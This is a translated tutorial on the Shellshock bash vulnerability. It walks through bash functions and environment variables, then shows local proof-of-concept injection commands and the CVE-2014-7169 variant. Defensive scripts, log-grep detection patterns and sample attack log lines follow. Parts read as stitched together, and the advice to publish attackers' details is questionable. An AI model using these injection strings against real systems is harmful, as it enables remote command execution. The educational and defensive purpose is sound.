Shellshock: remembering the Shellshock vulnerability

This post revisits the well-known Shellshock vulnerability, which once threatened systems worldwide. The content is a translation of the original article and discusses the impact and significance of the vulnerability.

shellshock

Sold) type of OS Command Injection was reported. The Shellshock vulnerability, also known as CVE-2014-6271, allowed attackers to inject their own code into Bash using specially crafted environment variables. It was a horror. But a horrific, beautiful vuln.

Bash supports exporting not just shell variables but also shell functions to other bash instances, via the process environment, to (indirect) child processes. Current bash versions use an environment variable named after the function, with a function definition starting with “() {” in the variable value, to propagate function definitions through the environment. The vulnerability occurs because bash does not stop after processing the function definition; it continues to parse and execute shell commands following the function definition.

For example, an environment variable setting of VAR=() { ignored; }; /bin/id would execute /bin/id when the environment is imported into the Bash process. The caveat is that the PATH variable might not have been set up yet, and Bash could crash after executing /bin/id, but the damage has already been done at that point.

The fact that an environment variable with an arbitrary name could be used as a carrier for a malicious function definition containing trailing commands made this vulnerability particularly severe, enabling network-based exploitation.

Even scarier, the NIST vulnerability database rated this vulnerability “10 out of 10” in terms of severity, and there were claims that the number of Shellshock attacks could have topped one billion. Shellshock-targeting DDoS attacks and IRC bots were spotted less than 24 hours after news about Shellshock went public last week!

Pretty nasty stuff, huh?

Understanding the Bash Shell

To understand this vulnerability, we need to know how Bash handles functions and environment variables. The GNU Bourne Again shell (BASH) is a Unix shell and command language interpreter. It was released in 1989 by Brian Fox for the GNU Project as a free software replacement for the Bourne shell (which was born back in 1977).

$ man bash
NAME
       bash - GNU Bourne-Again SHell
SYNOPSIS
       bash [options] [file]
COPYRIGHT
       Bash is Copyright (C) 1989-2011 by the Free Software Foundation, Inc.
DESCRIPTION
       Bash is an sh-compatible command language interpreter that executes commands read from the standard input or from a file. Bash also incorporates useful features from the Korn and C shells (ksh and csh).
(...)

Of course, there are other command shells out there. However, Bash is the out-of-the-box shell for most of the Linux systems (and Linux-based systems), including many Debian-based distributions and the Red Hat & Fedora & CentOS combo.

Functions in Bash

What is interesting about Bash is that it is also a scripting language, with the ability to define functions. This is super useful when you are writing scripts. For example, hello.sh:

#!/bin/bash
function hello {
    echo Hello!
}
hello

which can be called with:

$ chmod a+x hello.sh
$ ./hello.sh
Hello!

A function in Bash may be compacted into a single line. You just need to choose a name and put a () after it. Everything inside {} will belong to the scope of your function.

For example, we can create a function bashiscool that uses echo to display the message on the standard output:

$ bashiscool() { echo "Bash is actually Fun"; }
$ bashiscool
Bash is actually Fun

Child Processes and the export command

We can make things even more interesting. The statement bash -c can be used to execute a new instance of Bash, as a subprocess, to run new commands (-c passes a string with a command). The catch is that the child process does not inherit the functions or variables that we defined in the parent:

$ bash -c bashiscool # spawn a nested shell
bash: bashiscool: command not found

So before executing a new instance of Bash, we need to export the environment variables to the child. That’s why we need the export command. In the example below, the flag -f tells export that the name refers to a shell function rather than a variable:

$ export -f bashiscool
$ bash -c bashiscool # spawn a nested shell
Bash is actually Fun

In other words, first, the export command creates a regular environment variable containing the function definition. Then, the second shell reads the environment. If it sees a variable that looks like a function, it evaluates this function!

A Simple Example of an Environment Variable

Let’s see how environment variables work by examining a common command. For instance, a very popular one, grep, is used to search for patterns in files (or the standard input).

Running grep on a file that contains the word 'fun' will return the line where this word is. Running grep with the flag -v will return the non-matching lines, i.e., the lines where the word 'fun' does not appear:

$ echo 'bash can be super fun' > file.txt
$ echo 'bash can be dangerous' >> file.txt
$ cat file.txt
bash can be super fun
bash can be dangerous
$ grep fun file.txt
bash can be super fun
$ grep -v fun file.txt
bash can be dangerous

The grep command uses an environment variable called GREP_OPTIONS to set default options. This variable is usually set to:

$ echo $GREP_OPTIONS
--color=auto

To update or create a new environment variable, it is not enough to use the Bash syntax GREP_OPTIONS='-v', but instead, we need to call the builtin export:

$ GREP_OPTIONS='-v'
$ grep fun file.txt
bash can be super fun
$ export GREP_OPTIONS='-v'
$ grep fun file.txt
bash can be dangerous

The env command

The env command prints the environment variables. But it can also be used to run a single command with one or more exported variables given to that command. In this case, env starts a new process, modifies the environment, and then calls the command that was provided as an argument (the env process is replaced by the command process).

In practice, to use env to run commands, we:

  1. set the environment variable value with env,
  2. spawn a new shell using bash -c,
  3. pass the command/function we want to run (for example, grep fun file.txt).

For example, this does not work; we need another shell:

$ env GREP_OPTIONS='-v' | grep fun file.txt
bash can be super fun

Here we go:

$ env GREP_OPTIONS='-v' bash -c 'grep fun file.txt'
bash can be dangerous

Facing the Shellshock Vulnerability

What if we pass some function to the variable definition?

$ env GREP_OPTIONS='() { :;};' bash -c 'grep fun file.txt'
grep: {: No such file or directory
grep: :;};: No such file or directory
grep: fun: No such file or directory

Since what we added looks strange once it is parsed as arguments to grep, grep does not understand it.

What if we add stuff after the function? Things start to get weirder:

$ env GREP_OPTIONS='-v () { :;}; echo NOOOOOOOOOOOOOOO!' bash -c 'grep fun file.txt'
grep: {: No such file or directory
grep: :;};: No such file or directory
grep: echo: No such file or directory
grep: NOOOOOOOOOOOOOOO!: No such file or directory
grep: fun: No such file or directory
file.txt:bash can be super fun
file.txt:bash can be dangerous

Did you notice the confusion? Both the matching and the non-matching lines were printed! It means that some of the stuff was parsed fine. When in doubt, Bash appears to do everything?

Now, what if we just keep the function, taking out the only thing that makes sense, -v?

$ env GREP_OPTIONS='() { :;}; echo NOOOOOOOOOOOOOOO!' bash -c 'grep fun file.txt'
NOOOOOOOOOOOOOOO!
grep: {: No such file or directory
grep: :: No such file or directory
grep: }: No such file or directory
grep: fun: No such file or directory

Did you notice that echo NOOOOOOOOOOOOOOO! was executed normally? This is the (first) Shellshock bug!

The above works because when the new shell sees an environment variable beginning with (), it gets the variable name and executes the string following it. This includes running anything after the function, i.e., the evaluation does not stop when the end of the function definition is reached!

Remember that echo is not the only thing we can do. The possibilities are unlimited! For example, we can issue any /bin command:

$ env GREP_OPTIONS='() { :;}; /bin/ls' bash -c 'grep fun file.txt'
anaconda certificates file.txt IPython
(...)

WOW.

Worse, we actually don’t need to use a system environment variable nor even call a real command:

$ env test='() { :;}; echo STILL NOOOOOOOO!!!!' bash -c :
STILL NOOOOOOOO!!!!

In the example above, env runs a command with an arbitrary variable (test) set to some function (in this case just a single :, a Bash builtin defined as doing nothing). The semicolon signals the end of the function definition.

Again, the bug is in the fact that there's nothing stopping the parsing of what is after the semi-colon!

There is more than one!

The Shellshock vulnerability is an example of an arbitrary code execution (ACE) vulnerability, in which attacker-supplied code is executed by a running program.

An attacker will use an ACE vulnerability to run a program that gives her a simple way of controlling the targeted machine. This is nicely achieved by running a Shell such as Bash.

It is not surprising that right after a patch for CVE-2014-6271 was released, several new issues were opened:

$ env X='() { (a)=>\' bash -c "echo vulnerable"; bash -c "echo Bug CVE-2014-7169 patched"
vulnerable
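As an added defender-side check (example code written for this page, not from the original article or the bash project): the first function packages the harmless echo probe used in the sections above into something a script can call, and the other two emulate the wrapper idea from the suggestions that follow by refusing to start bash when any environment variable already carries a function definition. It assumes a POSIX sh with env, awk and bash available; guarded_bash is a hypothetical helper name.

```shell
#!/bin/sh
# Report whether the installed bash still imports and runs commands that
# follow a function definition in an environment variable (CVE-2014-6271).
# The probe only echoes a marker; a patched bash never prints "vulnerable".
check_bash_function_import() {
    command -v bash >/dev/null 2>&1 || { echo "no-bash"; return 2; }
    out=$(env x='() { :;}; echo vulnerable' bash -c 'echo probe' 2>/dev/null)
    case "$out" in
        *vulnerable*) echo "vulnerable"; return 1 ;;
        *)            echo "patched" ;;
    esac
}

# List the names of environment variables whose value begins with the
# "() {" marker that pre-patch bash treated as an exported function.
# Legitimately exported functions (BASH_FUNC_name%% in newer bash) are
# listed too, which is what a "no exported functions" policy wants.
function_env_vars() {
    env | awk -F= 'index($2, "() {") == 1 { print $1 }'
}

# Emulate the "refuse to run bash" wrapper (hypothetical helper): start
# bash only when no function-like variable is present in the environment.
guarded_bash() {
    suspicious=$(function_env_vars)
    if [ -n "$suspicious" ]; then
        echo "refusing to start bash; function-like variables: $suspicious" >&2
        return 1
    fi
    bash "$@"
}
```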

Suggestions to Protect Your System against similar vulnerabilities

Update your system! And keep updating it… Many Linux distributions have released new Bash software versions, so follow the instructions of your distribution.

  • Update the firmware on your router or any other web-enabled devices as soon as updates become available. Remember to only download patches from reputable sites (only HTTPS please!), since scammers will likely try to take advantage of Shellshock reports.
  • Keep an eye on all of your accounts for signs of unusual activity. Consider changing important passwords.
  • HTTP requests to CGI scripts have been identified as the major attack vector. Disable any scripts that call the shell (this does not fully mitigate the vulnerability, however). To check whether your system is vulnerable, you can use this online scanner. Consider mod_security if you’re not already using it.
  • Because the HTTP requests used by Shellshock exploits are quite distinctive, monitor logs for keywords, for example with grep '() {' access_log or cat access_log | grep "{ :;};". Some common locations for HTTP logs are: cPanel: /usr/local/apache/domlogs/, Debian/Apache: /var/log/apache2/, or CentOS: /var/log/httpd/.
  • Firewalls and network filters can be set to block requests that contain the attack signature, i.e. “() {“.
  • In the case of an attack, publish the attacker’s information! You can use awk and uniq (where print $1 means print the first column) to get her IP, for example:

$ cat log_file | grep "{ :;};" | awk '{print $1}' | uniq

  • If you are on a managed hosting subscription, check your provider’s status. For example, Acquia, Heroku, Mediatemple, and Rackspace.
  • Update your Docker containers and AWS instances.
  • If you are running production systems that don’t need exported functions at all, take a look at this wrapper, which refuses to run bash if any environment variable’s value starts with a left parenthesis.
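The log-monitoring and IP-extraction suggestions above, turned into a small script (an added example, not from the original article). The access log lines are constructed samples, and hits are counted per source IP with sort | uniq -c rather than the bare uniq shown above, so non-adjacent entries from the same address are merged. It assumes a POSIX sh with grep, awk, sort and uniq.

```shell
#!/bin/sh
# Constructed sample of an Apache combined-format access log (not real traffic).
# Three requests carry the "() {" function-definition marker in the
# User-Agent or Referer field; one is an ordinary page view.
SAMPLE_LOG='203.0.113.7 - - [25/Sep/2014:10:01:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo vulnerable"
198.51.100.23 - - [25/Sep/2014:10:01:15 +0000] "GET /index.html HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.7 - - [25/Sep/2014:10:02:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { :;}; echo vulnerable" "-"
192.0.2.88 - - [25/Sep/2014:10:03:01 +0000] "GET /cgi-bin/hello.sh HTTP/1.1" 200 12 "-" "() { ignored; }; /bin/id"'

# Print the log lines that carry the Shellshock signature. With file
# arguments it reads those files (-h drops the filename prefix so the
# source IP stays in column 1); without arguments it scans the sample.
shellshock_hits() {
    if [ $# -gt 0 ]; then
        grep -h -F -- '() {' "$@"
    else
        printf '%s\n' "$SAMPLE_LOG" | grep -F -- '() {'
    fi
}

# Source IPs of the hits with their request counts, most active first.
attacker_ips() {
    shellshock_hits "$@" | awk '{ print $1 }' | sort | uniq -c \
        | sort -rn | awk '{ print $2, $1 }'
}
```

Run attacker_ips /var/log/apache2/access.log (or your distribution's log path) to apply it to a real log instead of the sample.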

Learning References

Reviews

Bugs Description

Proof-of-Concept Attacks

Thank you for reading!

I hope this post sheds a bit of light on how OS Command Injection vulnerabilities work, empowering hackers and developers to experiment and innovate more!

Resources and source codes related to this tutorial are available here.

Translated from: https://medium.com/python-for-the-utopian/remembering-the-shellshock-vulnerability-403626af44a5
